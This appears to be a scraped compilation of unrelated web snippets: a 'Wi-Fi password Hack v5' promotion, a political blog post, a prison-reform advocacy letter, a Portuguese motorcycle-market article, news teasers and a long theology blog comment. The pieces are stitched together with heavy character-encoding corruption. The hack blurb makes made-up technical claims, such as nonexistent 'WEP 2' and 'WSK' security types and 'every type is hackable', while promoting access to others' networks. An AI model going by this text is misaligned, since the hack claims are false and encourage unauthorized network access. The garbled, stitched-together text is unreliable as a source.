Wi-Fi password Hack v5. With a beautifull design, a silverish skin and a blueish font, this is one hack which is very, vet, very easy to use! Even my granddaughter Mary managed to use it in order to play with her virtual friends on the Internet. What do you have to do? First, type the SSID of the router. Ussualy is admin or the model of the router: you can just find it by scanning with the Windows utilities. Next, choose the security type: it could be WEP, WEP 2 or even WSK, it depends on the router. It doesnât matter what type of security is, every type is hackable. Next, press on Start hacking and the program will handle you the password. Now you have free internet. Congratulations!
|I'd pay more tax to see Richard Littlejohn survive on benefits||I shouldn't read Richard Littlejohn's weekly diatribe of hate but every now and then I get copied into one of his more repugnant observations on life.|
This week he chimes into the economic debate with "More tax? we'd all be better off on benefits." He roundly condemns Lib Dem plans to make the rich pay more tax. Well, I'm told Littlejohn earns something in the region of Â£750,000 a year for his column so it's no wonder he's not keen on the idea. I mean not everyone can be as fair minded and benelovant on the issue as Warren Buffett. However, what I find deplorable is his insistance on having a go at the most vulnerable people in our society to make his point.
His rant about paying more taxes is basically an excuse to have a go at benefit claimants and asylum seekers.
"Weâd all be better off on benefits, except there wouldnât be anyone left to pay for those benefits. Vince Cable favours a âmansion taxâ on homes worth more than Â£2âmillion. Will that apply to the Somali asylum seeker who has just taken up residence in a Â£2âmillion house in West Hampstead."
Of course we would Richard. I'd like to see you survive on Â£67.50 a week. In fact, I'd pay more tax myself to see it happen. Better still, I'd like to see him experience first-hand what it's really like to be an asylum seeker.
We could put him up in Colnbrook immigration prison where three asylum seekers have died since 2 July or have members of his family detained in Yarl's Wood where one child spend 166 days in detention before her third birthday.
These are the people who really don't have a voice. It's a shame those that speak the loudest like Littlejohn see them as easy fodder for their bigotry. Maybe it's because he knows they can't talk back.
|Webinar: Maximize Omnichannel and Defend Cyber Attacks @incite_social||The recent ransomware outbreak has left marketers vulnerable and concerned. With the increase in marketing campaigns across a variety of channels, achieving an integrated, seamless experience across multiple touchpoints involves...|
|Support the Prison Reform and Redemption Act, H.R. 3356|
On behalf of FreedomWorks activists nationwide, I urge you to contact your representative and encourage him or her to cosponsor the Prison Reform and Redemption Act, H.R. 3356, introduced by Rep. Doug Collins (R-Ga.). This bill would require the Attorney General to develop an offender risk and needs assessment system and incentivizes offenders to lower their risk of recidivism.
On a fiscal level, this bill simply makes sense. Right now, taxpayers are not getting a return on their investment. In 2005, the Bureau of Justice Statistics an office of the Department of Justice tracked over 400,000 offenders in over 30 states after their release from prison. The study found that within three years 67.8 percent reoffended and in five years 76.6 percent reoffended. This failure rate is unacceptable, and Congress must change the direction by utilizing evidenced-based practices to reduce recidivism.
Thankfully, the states â the laboratories of policy innovation â have shown that rehabilitative programming in state prisons reduces recidivism and enhances public safety. In 2007, for example, Texas began the first phase of its justice reinvestment initiative, using a data-driven approach to corrections to reduce recidivism. Crime in the Lone Star State is now at its lowest rate 1968. More than 30 states, including Georgia and South Carolina, have adopted similar justice reinvestment initiatives.
The Prison Reform and Redemption Act would require the Attorney General to develop a post-sentencing risk and needs assessment. All prisoners in the federal prison system will be assigned recidivism reduction programming. The Bureau of Prisons would be responsible for the implementation of the risk and needs assessments for each prisoner and development of recidivism reduction programming.
Each offender will be assessed for risk on an individual level to develop a comprehensive plan based on his or her need and probability of reoffending. Utilizing private public partnerships in this capacity would allow non-profit organizations, educational institutions, and private sector entities to build relationships and community for the most vulnerable citizens in our society. The bill would incentivize prisoners to reduce their risk of recidivism. For every 30 days of successfully completed recidivism reduction programming, prisoners will ten days of time credits. Prisoners can earn an additional five days, for a total of 15 days, after two successful risk assessment periods. Those prisoners who have are considered low or no risk of recidivism can earn an additional five days, for a total of 15, provided that their risk of recidivism doesnât increase over two risk assessment periods.
Certain categories offenders â including violent offenders, sex offenders, and terrorists â would not be eligible to earn time credits.
The Prison Reform and Redemption Act would allow for great access to visitation and phone privileges, create a pilot program to address the heroin and opioid epidemic, and prohibit the use restraints of pregnant offenders unless the offender poses a serious threat. The bill would require the Bureau of Prisons to collect statistical and demographic information to be provided to Congress on an annual basis.
Congress has fallen behind the states on this important issue. While other policy changes â such as sentencing reforms and reentry reforms â are needed, this bill would bring a key component of state-level success to the federal prison system, offering prisoners an opportunity for restorative justice while enhancing public safety. For these reasons, I urge you to contact your representative and encourage him or her to cosponsor the Prison Reform and Redemption Act, H.R. 3356.
Adam Brandon, President, FreedomWorks
|MERCADO MOTOCICLÃSTICO 2006-2007|
NÂº273 ANECRA Setembro 2008
Literalmente na cauda da Europa, Portugal parece dar sinais de por lÃ¡ querer continuar no que ao sentido figurado da expressÃ£o concerne. O mercado motociclÃstico, ainda que palidamente a recuperar, nÃ£o Ã© â de todo â excepÃ§Ã£o.
O ano de ouro deste sector aconteceu em 1999. Com mais de dezanove mil motos matriculadas, nunca mais a histÃ³ria se repetiu. Hoje, quase uma dÃ©cada depois, os sintomas vaticinam que a faÃ§anha nÃ£o torne a acontecer, pelo menos a breve trecho. Em 2002 e 2003 as quedas ocorreram, inclusivamente, a compassos de dois dÃgitos percentuais. Em 2006 o ciclo inverteu-se timidamente, com uma recuperaÃ§Ã£o de 2%. Entre outros contributos, essa recuperaÃ§Ã£o tambÃ©m sucedeu por forÃ§a da entrada de novos concorrentes no mercado, oriundos do eixo China-Coreia, que com os seus produtos finais de baixo custo conseguiram nÃ£o sÃ³ penetrar no nosso mercado, mas, inclusive, expandi-lo minimamente. A nÃvel europeu, por comparaÃ§Ã£o no mesmo perÃodo, o nosso paÃs manteve-se Ã margem da tendÃªncia verificada. Onde todos os outros aumentaram, nÃ³s reduzimos. Portugal, envolto num cinzentismo conjuntural, continua o cenÃ¡rio perfeito para o fracasso dos mais vulnerÃ¡veis.
Este segmento reflecte, ainda que aparentemente, uma tendÃªncia diametralmente oposta Ã vigente no mercado em que estÃ¡ inserido. Parece ter crescido para o dobro de um ano para o outro. Ã certo que a entrada de fabricantes como a Keeway e a Kymco funcionou como dinamizador comercial, por via da introduÃ§Ã£o de novos modelos com preÃ§os de venda e manutenÃ§Ã£o muito competitivos, o que, em consequÃªncia, fez com que os fabricantes tradicionais e conceituados se vissem compelidos a reorganizar o seu portfolio em articulaÃ§Ã£o com o modus operandi das suas estruturas no terreno. PorÃ©m, nÃ£o estaria esta anÃ¡lise enviesada se nÃ£o fosse o facto de, atÃ© meados de 2006, nÃ£o haver a obrigatoriedade de registo de matrÃculas na antiga DGV (agora IMTT) para motos de cilindrada inferior a 50cc. Como era prÃ¡tica corrente, as matrÃculas atÃ© entÃ£o eram emitidas pelas cÃ¢maras municipais, passando, desde essa data, a ser emitidas a nÃvel central. Portanto, a anÃ¡lise de 2006 para 2007 Ã© prejudicada em cerca de seis meses, que foram aqueles em que se venderam motos (ainda com os registos camarÃ¡rios) mas que agora nÃ£o entram nas estatÃsticas. JÃ¡ a anÃ¡lise de 2005 para 2006 seria absurda, pois representaria a transiÃ§Ã£o do nada para o tudoâ¦
A Keeway resulta numa aposta ganha. Apresenta taxas de crescimento anuais que sÃ³ sÃ£o possÃveis porque a marca Ã© nova no mercado. Ou seja, a montante, no seu negÃ³cio, tudo estava ainda por fazer. Deste modo, tanto a polÃtica de preÃ§os como a divulgaÃ§Ã£o e promoÃ§Ã£o dos seus produtos nos fÃ³runs prÃ³prios levaram a que rapidamente atingisse o primeiro lugar das vendas com o popular modelo Uricane 50. Perante os factos, somos levados a concluir que os produtos orientais nÃ£o sÃ³ chegaram, como tambÃ©m conquistaram o mercado nacional. Esta Ã©, aliÃ¡s, uma tendÃªncia de fundo noutros sectores da nossa economia global.
O motociclista portuguÃªs estÃ¡ todos os anos um ano mais velho. NÃ£o hÃ¡ âsangue novoâ a entrar no sistema. O parque mantÃ©m-se estÃ¡vel, e com a falta de incentivos (ou com a criaÃ§Ã£o de novos entraves) o âmundo das motosâ jÃ¡ nÃ£o seduz como seduziu em tempos. Uma tÃmida recuperaÃ§Ã£o serÃ¡ o comentÃ¡rio mais fiel aos nÃºmeros apurados. JÃ¡ 2006 havia sido um ano de ligeiras melhorias, porÃ©m, ambos, encontram-se muito distantes das mais de dezanove mil unidades matriculadas em 1999, o ano de ouro por excelÃªncia.
O modelo campeÃ£o de vendas foi a Hornet 600 da Honda, seguido da Yamaha FZ6 e da Suzuki GSXR 1000.
A preferÃªncia dos motociclistas lusos recai, maioritariamente, sobre modelos utilitÃ¡rios ou desportivos. As trail, cruisers e scooters constituem nichos num mercado jÃ¡ de si pequeno. Apesar dos circunstancialismos, o segmento das cruisers parece ter ainda bastante potencial. A atenÃ§Ã£o do pÃºblico jÃ¡ se manifesta de forma diferente em relaÃ§Ã£o a estas motos. Os motivos poderÃ£o ser de vÃ¡ria ordem, desde a crescente afluÃªncia destes modelos aos bike shows (o que suscita alguma curiosidade e admiraÃ§Ã£o), Ã exibiÃ§Ã£o de programas de tv sobre transformaÃ§Ã£o deste gÃ©nero de motos, passando tambÃ©m pela aposta consistente da Harley-Davidson no marketing institucional e de produto.
Outro caso que se vai verificando com relativa frequÃªncia Ã© o de motociclistas acidentados em motos desportivas que reequacionam o seu percurso, e optam por permanecer nas âduas rodasâ aos comandos de âmontadasâ menos nervosas. Ã aÃ que as trail e as cruiser os poderÃ£o atrair.
Por seu turno, para deslocaÃ§Ãµes citadinas, a versatilidade, a economia e a comodidade oferecidas pelas scooters de pequena e mÃ©dia cilindrada, sÃ£o trunfos de peso para angariar novos adeptos, nesta era em que os custos do quilÃ³metro percorrido e do minuto de estacionamento atingem mÃ¡ximos histÃ³ricos.
MOTO4 & ATV
No segmento dos quadriciclos, a Yamaha, lÃder por excelÃªncia e tradiÃ§Ã£o, foi pela primeira vez destronada. A Suzuki com o seu LTR 450 apoderou-se do primeiro lugar. A razÃ£o, segundo o prÃ³prio importador, prende-se com o facto de atÃ© 2007 a marca nÃ£o possuir oferta direccionada a este segmento. Uma vez que ela foi disponibilizada, a lideranÃ§a impÃ´s-se naturalmente. Tanto mais que o segundo modelo no pÃ³dio surge sob a mesma insÃgnia, tratando-se do LTZ 400. A Yamaha aparece em terceiro lugar com o YFM 300.
DISTRIBUIÃÃO DO PARQUE SEGURADO DE MOTOCICLOS POR DISTRITOS
Todos os distritos, sem excepÃ§Ã£o, contribuÃram para o aumento de quase dez mil unidades face a 2005. Continuamos a constatar uma predominÃ¢ncia de motos no litoral, especialmente mais a norte (excepÃ§Ã£o feita, claro estÃ¡, para o distrito de Lisboa, que Ã© o maior concentrador do paÃs). Faro, continua a ser a recordista de motos per capita, com apenas 42 habitantes para cada moto. Em termos absolutos, o Porto supera em dobro as motos de Faro, mas como tem mais do quÃ¡druplo da populaÃ§Ã£o, a relaÃ§Ã£o final dos habitantes com as motos revela-se, em termos relativos, de menor expressÃ£o.
EVOLUÃÃO DO MERCADO EUROPEU
O mercado europeu, tal como o portuguÃªs, bateu no fundo em 2002. A diferenÃ§a Ã© que o primeiro, daÃ em diante, tem sabido recuperar, ao passo que o segundo nÃ£o. PaÃses como a FranÃ§a, ItÃ¡lia, Reino Unido e Alemanha, historicamente conhecidos pela sua tradiÃ§Ã£o nas duas rodas, nÃ£o servirÃ£o de ponto de comparaÃ§Ã£o. JÃ¡ a GrÃ©cia, Hungria, LituÃ¢nia servem na perfeiÃ§Ã£o para estabelecermos analogias que ilustram bem a nossa falta de estratÃ©gia e desapego do sector. Actualmente, com percursos de venda ascendentes, estas economias reclamam para si os benefÃcios (em sentido lato) que um maior parque motociclÃstico lhes traz. Neste caso, em termos estritamente econÃ³micos, o fomento das vendas traduz-se tambÃ©m â e necessariamente â na defesa do tecido empresarial de serviÃ§os de reparaÃ§Ã£o e manutenÃ§Ã£o, o qual Ã© determinante para a independÃªncia e autonomia de muitas famÃlias que dele retiram o seu sustento, contribuindo para os cofres do Estado, em vez de o sobrecarregarem.
Com as cartas na mesa, as conclusÃµes afiguram-se claras. A China massifica a sua oferta assente, com predominÃ¢ncia, no baixo custo em detrimento dos altos padrÃµes de qualidade ou inovaÃ§Ã£o; o mercado portuguÃªs continua mergulhado numa crise e, tanto a nÃvel polÃtico como empresarial, nÃ£o hÃ¡ quem promova medidas de apoio estratÃ©gicas. Este problema, a jusante, agravarÃ¡ ainda mais a debilidade do sector e acentuarÃ¡ a distÃ¢ncia que nos separa dos restantes modelos sociais e de gestÃ£o europeus, que muitas vezes nos orgulhamos de referir, sobretudo quando nos faltam os verdadeiros argumentos para sustentar a riqueza de uma ideia. Ainda assim, com os juros a aumentar, o desemprego em ascensÃ£o, a inflaÃ§Ã£o a subir, a carga fiscal a subtrair uma importante fatia do rendimento de singulares e colectivos que pagam impostos, as taxas e emolumentos em serviÃ§os do Estado a sofrerem actualizaÃ§Ãµes substanciais, a especulaÃ§Ã£o dos combustÃveis, as portagens onerosas em vias de comunicaÃ§Ã£o com investimentos jÃ¡ amortizados (e com custos de exploraÃ§Ã£o comedidos face ao encaixe de proveitos), as obras pÃºblicas de interesse questionÃ¡vel, e os salÃ¡rios a reflectirem perda efectiva de poder de compra, ainda assim, dizia eu, o mercado, nestes dois Ãºltimos anos, deu mostras de querer espevitar. Citando o reputado economista Dr. JoÃ£o CÃ©sar das Neves a propÃ³sito do atraso de Portugal face aos restantes paÃses europeus: Â«O que este povo nÃ£o faria se tivesse uma estratÃ©gia certa?Â».
Â© Todos os direitos do texto estÃ£o reservados para REVISTA ANECRA, uma publicaÃ§Ã£o da ANECRA. Contacto para adquirir ediÃ§Ãµes jÃ¡ publicadas: +351 21 392 90 30.
Â© General Moto, by HÃ©lder Dias da Silva 2008
|SNAPCHAT WARNING: Children face 'grooming and bullying' with new map feature||
CHILDREN across Oxfordshire have been warned against broadcasting their location on Snapchat amid concerns it could leave them vulnerable to grooming, stalking and bullying.
|Murder By Numbers S01E05 Grave Secrets WEB-DL x264-JIVE||Season 01, Episode 05 –Â “Grave Secrets” When a woman is found brutally murdered in her home, all signs point to a local troublemaker. But when more bodies start piling up, police realize they may have a serial killer at large – preying on the town’s most vulnerable citizens. Links:Â HOMEPAGEÂ âÂ TVGuide Murder.By.Numbers.S01E05.Grave.Secrets.WEB-DL.x264-JIVE MP4 | AAC VBR | […]|
|Realms of Arkania Star Trail-CODEX||Release Description: The united orc tribes attempted to invade the region of Thorwal, but a group of valiant adventurers thwarted their plans during their previous quest. Now the orcs have regrouped and attacked other, more vulnerable areas â Lowangen is occupied and half the Svellt Valley lies in ashes. An elf ambassador summons the party […]|
|Mick Jagger: England Lost|
From Friday's Guardian:
England Lost uses a disenchanted, plain-speaking football fan as the narrator for what he said was the âfeeling that we are in a difficult moment in our historyâ.
Itâs a rough, rambling but ready vocal performance, with some blunt one-liners: âI went to see England but England lost / I went round the back but they said piss off.â
Jagger then sings heâll âgo home and smoke a jointâ after a match he didnât even want to go to, before adding: âI went to find England and it wasnât there/ I think I lost it down the back of my chair / I think Iâm losing my imagination/ Iâm tired of talking about immigration / You canât get in and you canât get out / I guess thatâs what itâs really all about.â
Jagger said: âItâs obviously got a fair amount of humour because I donât like anything too on the nose but itâs also got a sense of vulnerability of where we are as a country.â
If the England Lost music video is anything to go by, itâs clear enough that Jagger â one of the great re-exporters of US folk music to American audiences, whose band made arguably its best album while holed up in France as tax exiles â has misgivings about a Britain turning inward.
It features Welsh actor Luke Evans as a polite, well dressed gentleman in a cryptic scenario where he is fleeing a menacing array of compatriots who end up dragging him back from the surf as he apparently tries to swim beyond British shores.
|XoftSpySE Review - Does XoftSpySE Work to Remove Spyware From Your Computer?||If you are now starting have have annoying pop ups appear on your computer screen from nowhere, plus your operating system starting to slow down, then you probably have spyware or adware. You cannot let these problems just get worse because if you are not aware, spyware software will track your viewing habits on the web so as to bring you the relevant adds to display for you. It will also can leave your personnel and private information vulnerable.|
|Huge iceberg breaks free from the Antarctica Larsen C ice shelf|
An iceberg the size of Delaware has broken free from an Antarctic ice shelf, leaving the rest of the shelf vulnerable to collapse and serving as a harbinger of future sea-level rise that could pose a serious threat to coastal communities such as the Falkland Islands.
|Comment on Microsoft Patches Windows XP and Windows Server 2003 Against Wannacry by As WannaCrypt Recovery Continues, Analysts Back Microsoft's Leader - InfoSecHotSpot||[…] Brokers released the attack vulnerability that ransom-ware hackers exploited.” In addition, Microsoft also took the very unique step of recently releasing security updates to address the vulnerability for Windows XP and Server 2003, even though they are both years past […]|
|Seeing without a State -- Why James Scott matters to foreign aid|
International development is social engineering, yes, but with a social justice lens. Its success hangs on its ability to translate intention into action, the offer of foreign assistance into local appropriation, application and transformation. Redundancy should be its metric of success, yet international development has become a steady career track for young westerners, many plied with advanced degrees in its theories and operational models. None of this--the academic programs, the career tracks--existed twenty years ago. The simple vocational appeal of 'working oneself out of a job' is long gone.
In the increasing professionalization and careerism of foreign aid (development & disaster relief), what is sacrificed are the years of fieldwork needed to cultivate a hands-on appreciation of destitution itself, the human suffering and loss of potential that ensues, and their causal origins in failed public institutions and cynical leadership. Academic degrees now matter more in development than field experience; the truism that local immersion is the bestâmany would say onlyâteacher is no longer followed. In my travels and teachings, I notice among students and young development professionals an unspoken disregard for living at the village level or heart of an urban slum for any period of time. There one is bereft of social media, most modern technology and infrastructure. Life must be experienced purely on local terms. Discomfort with vulnerability and perceived risk may be part of this rejection, but personal security is almost always a question of local networks.
Read the rest of this short analysis over at Medium...
|Comment on Video premiere: Joey Wrightâs âBlack Holeâ by Alec||This made me feel good. Vulnerable makes for great songwriting.|
|La riqueza de los pueblos indÃgenas: para celebrar y para reflexionar||En la actualidad, se encuentran entre las poblaciones mÃ¡s vulnerables y perjudicadas del mundo, segÃºn la ONUAyer, como cada 9 de agosto se celebrÃ³ el DÃa Internacional de los Pueblos IndÃgenas. La fecha fue instituida por la Asamblea General de las Naciones Unidas, el 23 de diciembre de 1994, en consideraciÃ³n a que el 9 Leer mÃ¡s…
|Talos Security Find Security Bugs in iOS and Mac OS X|
Cisco’s Talon security team are good at their job, so good in fact that they have now revealed not just one butÂ multiple security vulnerabilities that put both iOS devices and Mac OS X devices at risk! The bugs have since been fixed, with each of the five vulnerabilities addressed in the latest versions of the […]
The post Talos Security Find Security Bugs in iOS and Mac OS X appeared first on eTeknix.
|iOS Lock Screen Bypass Vulnerability Fixed By Apple|
Apple has reportedly fixed a security flaw in the iOS operating system that would allow attackers to be able to bypass passcode lock screens on iPhone 6S and 6S Plus that are running version 9.3.1 of iOS. The bypass would have allowed malicious parties to be able to access the address book and photos of […]
The post iOS Lock Screen Bypass Vulnerability Fixed By Apple appeared first on eTeknix.
|Comment on Top 5 Reasons Why You Should Choose Linux Over Windows 10 by penultimateName||Not so fast. I do agree there is a level of truth to all of the points. However there were vulnerabilities recently discovered that were open for a decade. Software is free but sometimes you get what you pay for. In any case many apps in the windows store is free. Very good chance Windows will continue to be free. For businesses maintenance is not free. There is no magic bullet. Linux has its place as well as Windows. Anyone that claims either one is the perfect solution is smoking the good stuff. I do have extensive experience with Linux at work.|
|La pauvretÃ© au Maroc||MeknescityEn 2014, 1,6 millionÂ de Marocains (4,8% de la population) Ã©taient encore en situation de pauvretÃ© absolue et 4,2 millions en situation de vulnÃ©rabilitÃ©, relÃ¨ve le HCP dans son enquÃªte sur la consommation et les dÃ©penses des mÃ©nages. Avec un poids dÃ©mographique de 40%, le milieu rural concentre 79,4% des pauvres et 64% des personnes vulnÃ©rables […]|
|Comment on Psychology is the Devil: A Critique of Jay Adamsâ Counseling Paradigm by T h e o â¢ p h i l o g u e||@Paul,
(i) I appreciate the time you have taken to reply to my thoughts with your own. Before I respond, a brief summary is in order:
<i>After concluding in my book review of Jay Adamsâ position as stated in one of his books is both unbiblical and problematic, you asked to choose the source of my authority, and gave me only two options: Science or God. I responded that the question bears an assumption I do not hold, then I explained my reasons for not sharing the assumption of the question. In your response, you argued that I had intentionally avoided your original question, and instead attacked a position that you donât actually hold.
You protested loudly that you love and trust science, do not have a problem with it, admitted it as a source of authority, and most importantly, that you never were or will be asking me to choose between the two authorities of God and science as I made you out to have done.
You contrast my âmisrepresentationâ to your actual view, where Godâs authority is âaboveâ scienceâs and is âultimateâ in comparison, even though both authorities are trustworthy. </i>
You call my motives and character into question for the length of my response and itâs hastening to digression from the real issue.</i>
In my rejoinder below, I will show that you have failed to take responsibility for your own word choice, and instead shifted the blame on me, making judgments about my moral character and motives (wowâ¦ you went way too far here) on the basis that I had intentionally distorted your original question to avoid answering it and hide something shameful.
(ii) PLEASE NOTE: The aim of https://theophilogue.com is openly stated to be critical research and open-minded exploration of philosophy and theology rather than the propagation or defense of religious dogmas. Itâs the wrong forum for calling the motives and character of strangers into question. You donât know me. If you did, we would be having this discussion over the phone, because I wouldâve deleted your comments and called you at my earliest convenience. If you are sensitive to the purpose of online forums, you would understand that a face to face talk in private would be the best venue for you to offerâunsolicitedâjudgements about my moral character and motives in love and with gentleness, believing the best about me in principle unless evidence seems to demand otherwiseânot when you happen to be stricken with a hunch or âimpression.â Your attention and respect for the purpose of this venue is appreciated, and Iâve never blocked comments of a critical nature aimed at me or my writing. Only spam. I donât run from confrontation, but the type of confrontation Iâm willing to face here spelled out in my description of this forumâsee my section "Three things you should know about this site" on my home page.
<blockquote> Iâm really curious to know Bradley, where does your authority come from.., science or God?</blockquote>
(A1) It is one thing to ask someone the source of their authority (SOA), it is quite another to ask which of two authorities they see as âultimateâ (WO2U)
(A2) It is one thing to ask someone which of two authorities they see as âultimateâ (WO2U) and which of two authorities should be seen as âultimateâ (WO2S)
(A2) In the question quoted above from your 1st response, you did not ask WO2U or WO2S, but rather SOA
(A3) My response was to SOA
(A4) Now in your 2nd response, a rejoinder, depicted your question as follows:
<blockquote>â¦the question isnât do I trust science, it is what is my ultimate authority and that is the question that you seem to have ignored in your response</blockquote>
(A5) I will refer below to the expression and word choice we find in your original question as âOE1â (original expression #1)
(A6) I will refer below to the expression and word choice we find in your re-wording of the question as âE2â (original expression #2)
(A7) I will refer to your position that I misrepresented question OE1 in my response as âORP1â (original response problem #1)
(A8) I will refer to the intended meaning of your original question as IMOE1 (intended meaning of expression 1)
(B) Now that you have the convenience of comparing the difference in wording from the way you asked your question originally, to the way you represented your original question in your 2nd response, I have hope to get more sympathy from you in your next reply (and more humility too honestly)
(B1) in the wording of your original question (hereafter OE1), you chose to ask about the source (âfrom whereâ) of my authority
(B2) in your 2nd response, you re-worded your original question (OE2) as a principle of binary discrimination (âbetween which twoâ)
(B3) the binary discrimination question concerns which among two possible authorities is my âultimateâ authority
(B4) in your 2nd response, you did not take any responsibility for having worded OE1 in a way that mis-communicated your actual meaning or intent
(B5) in your 2nd response, you blamed me for failing to correctly interpret OE1 as you intended it
(B6) in your 2nd response, you claim you intended OE1 as OE2
(B7) OQ1 is really a different question than OE2
(B8) therefore, the charges you have leveled against me, do not hold
(B9) the charge of red herring does not hold
(B10) the charge of dishonesty does not hold
(B11) the charge of ill intentionality does not hold
(B12) the charge of mis-representing your question (as you originally worded it) does not hold
(B13) the charge that I am being surreptitious does not hold
(B14) the charge of ignoring your question (as originally worded) does not hold
(B15) Now although you made many other mistakes in your 2nd response, it was this one that seems to drive your confidence, shape your posturing, provide the foundation for your critiques, and takes up the majority of your attention judging by the amount of space you gave to discussing it.
(C) Below I have teased out a number of what I see to be the meaning of some of your words to make it easy for you to read through and clarify if I have properly understood the intention behind the word choices of your expressions:
(C1) that in my response, Iâve committed the red herring fallacy: http://preview.tinyurl.com/hs6aoqc
(C2) that in my response, I fail to respond to your question as you originally intended it
(C3) that in my response, I avoid the principle meaning of your question
(C4) that in my response, I got off topic âquicklyâ
(C5) that in my response, I was at some point on topic
(C6) that in my response, I have taken extreme measures in ignoring and misrepresenting your question
(C7) that in my response, I illustrate what âlengths some people will goâ to avoid the principle meaning of a question
(C8) that in my response, my motive for going to âgreat lengthsâ was âto avoid the principle meaning of a questionâ
(C9) that in my response, Iâve misrepresented your question
(C10) that in my response, Iâve ignored your question
(C11) that in my response, I was lengthy
(C12) that in my response, the speed in which I digressed and the length of my digression gives me an appearance of not holding to biblical inerrancy
(C13) that in my response, I âseemâ to want to âturn toâ biblical inerrancy
(C14) that in my response, I âseemâ to want to âturn toâ divine inspiration
(C15) that in my response, the way in which I âseemâ to want to âturn toâ biblical inerrancy can be described as âauthoritativeâ
(C16) that in response, that the way in which I âseemâ to want to âturn toâ divine inspiration can be described as âauthoritativeâ
(C17) that seeming to âturn toâ as âauthoritativeâ divine inspiration and biblical inerrancy while not holding to them is dishonest
(C18) that seeming to âturn toâ as âauthoritativeâ divine inspiration and biblical inerrancy while not holding to them is surreptitious
(C19) that in my response, I was dishonest
(C20) Before our discussion ever got started, in my first reply to your question, I made an apology *just in case* I had poorly expressed myself and thereby had been the one responsible for any misunderstandings of my own position that provoked your confrontational tone and barrage of questions. You see Paul, we donât always know what the best word choice for our intentions will be until we see the aims, assumptions, misperceptions, and unshared meanings for those same words that belong to those who end up interpreting them. So re-wordings of oneâs understanding are often the result of poor word choice, careless thinking, and hasty writing. But they donât always result due to a deficiency in oneâs capacity for proper word choice, critical thinking, and careful writing. No. Sometimes they are just the bane of languageâs existenceâreminding us of itâs painful limitations and shortcomings as the creation of finite creatures with imperfect skills.
(C21) Upon further examination of the wording of your original question, I conclude that you never gave me sufficient reason to interpret the question as you had actually intended it, but sufficient reason to interpret it the manner I instinctively chose. Therefore, even though you were the one who hasten to judge me, I believe you now owe me an apology. Iâm not holding my breath, but I am optimistic about others until they give me a reason not to be or pose an immediate threat to my familyâs well being so as to require caution in keeping them safe.
(C22) Now that Iâve established whose paying closer attention to whom, and who is being more careful with their word choices, I hope our dialogue does not continue to devolve into the basic meaning of basic words anymore, where poor word choice is blamed on me instead of simply clarified, or the harsh premature judgments of my motives and character.
(C23) If you find yourself still opposed to me on this, the only way I would know how to move forward would be take each word of OE1 and OE2, parse each according to normative meanings, and challenge you find shared meanings matching your intentions anywhere in any other source. Or I could simply ask you this: Since itâs one thing to ask another what the source of her authority is, and another still to ask which authority between God and science she chooses to give ultimacy, please provide quotations from your original wording of the question, or any later articulation of it where that articulation is clearly indicated as the same question. Only evidence please. Make your case.
(D) Below I have teased out a number of what I see to be the meaning of some of your words to make it easy for you to read through and clarify if I have properly understood the intention behind the word choices of your expressions:
(D1) that my argument included falsely depicting you as âshooting down scienceâ which is not what you want to do
(D2) that Iâve represented your argument as presenting a âfalse dichotomyâ of choosing either the authority of science or choosing the authority of God
(D3) that you never presented the issue as which authority (God or science) to choose between so I misunderstood the word choice in your expressions
(D4) that you never intended to force me to choose between the authority of science and the authority of scripture as I had accused you of doing by the word choice found in your expressions
(D5) that in what you have said, you do not set Godâs authority âagainstâ science
(D6) you donât have a problem with science
(D7) you, on the contrary, love science
(D8) you do not distrust science
(D9) that the âonlyâ issue was the question of which authority (science or God) I view as ultimate
(D10) that your position places Godâs authority above science
(D11) that in placing Godâs authority above science, you do not do so in a way that sets them contrary to, or against, one another
(D12) Now the above leads me to logically conclude you could never see a scenario where one authority would actually contradict another in such a way as to force anyone committed to one to reject the other.
(D13) Yet strangely, this is exactly what you continue to do in the choice of words found in your expressions where you present the question.
(D14) I have provided examples below:
I am curious to know Bradley, where does your authority come fromâ¦ science or God?
Now the question I am asking you is, do you take as authoritative what science tells us, or what scripture tells us?
â¦science tells us about our origins, both for humanity and for the universe as a whole. Scripture tells a different story than what science doesâ¦
When I read Genesis I have no qualms in saying that what it says is diametrically opposed to what evolutionary science has to say.
(D15) Nowhere is it more clear that you do actually have a problem with science; that you do actually distrust science; that you do actually intend to make me choose between these two authorities in a zero-sum fashion; that the authority of one is contradicting the authority of another; that science is âagainstâ Godâs authority.
(D16) The clarity of this reaches a peak when state the two are âdiametrically opposed.â This statement was ironically followed by one of the rewordings of your question, which goes to prove that the intention of your original question is to have me choose between the two:
Science tells us about our origins, both for humanity and for the universe as a whole. Scripture tells a different story than what science does. When I read Genesis I have no qualms in saying that what it says is diametrically opposed to what evolutionary science has to say. Jesus, in the New Testament, speaks of the Genesis account in a literal way, and speaks of Adam and Eve as historical persons who were created from the dust of the earth. Now the question I am asking you is, do you take as authoritative what science tells us, or what scripture tells us?
(D17) May I remind you that you told me that you have no mistrust of science?
I can assure that I donât think it is self referentially absurd. <b>Only if you believe that I have some distrust of science can that premise be true, and I assure you that I donât</b>.
(E1) I would suspect there is a problem with your interpretation before I would call science into question.
(E2) After all, a text can be âinfallibleâ and âinerrantâ in the most supreme way and to the furthest possible extent. The superiority of an authority and the method of exercising that authority are two different things. When it comes to the Bible, Christians believe God exercises his authority primarily through the true meaning of the Bible. But if its interpreters are so beset with human depravity, interpreting with an sinful heart, and prone to mistakes without any last âstrongholdâ or aspect of human nature to trust in, that I find good reason to not trust in myself or my own abilities, transcendency or supremacy of authority provides no more assurance that I can attain to a proper understanding of the meaning of such an authoritative and inerrant words. In fact, it actually creates a defeater, since whereas science does not and cannot provide prescriptive morality so as to make demands that address human depravity head on, we would have less reason to be prejudiced against it, seeing no threat or demand is necessarily placed on our moral lives. But with Scripture, humans have plenty of reason to be bias and prejudice in their interpretations of it.
(E3) So long as it depends on oneâs own ability to prevent any influence of the deeply troubling imperfections, depravities, and limitations of my heart and mind on my interpretation of such an inspired, authoritative, and inerrant message, there is no hope such doctrines offer her towards that end. If in fact we did not have to rely on ourselves, because correct interpretation of Godâs words depended on God alone and was therefore most certain, we would not only be guaranteed an infallible message, but an infallible interpretation of it. Oh how wonderful such a scenario would be, and how our past in the West wouldâve developed so differently, and how many mothers and their small children, for example, wouldâve never had to be publicly disgraced and killed on account of heresy, since Godâs protection wouldâve prevented different interpretations, making human interpretation of Godâs intended message and the message itself virtually impossible to distinguish!
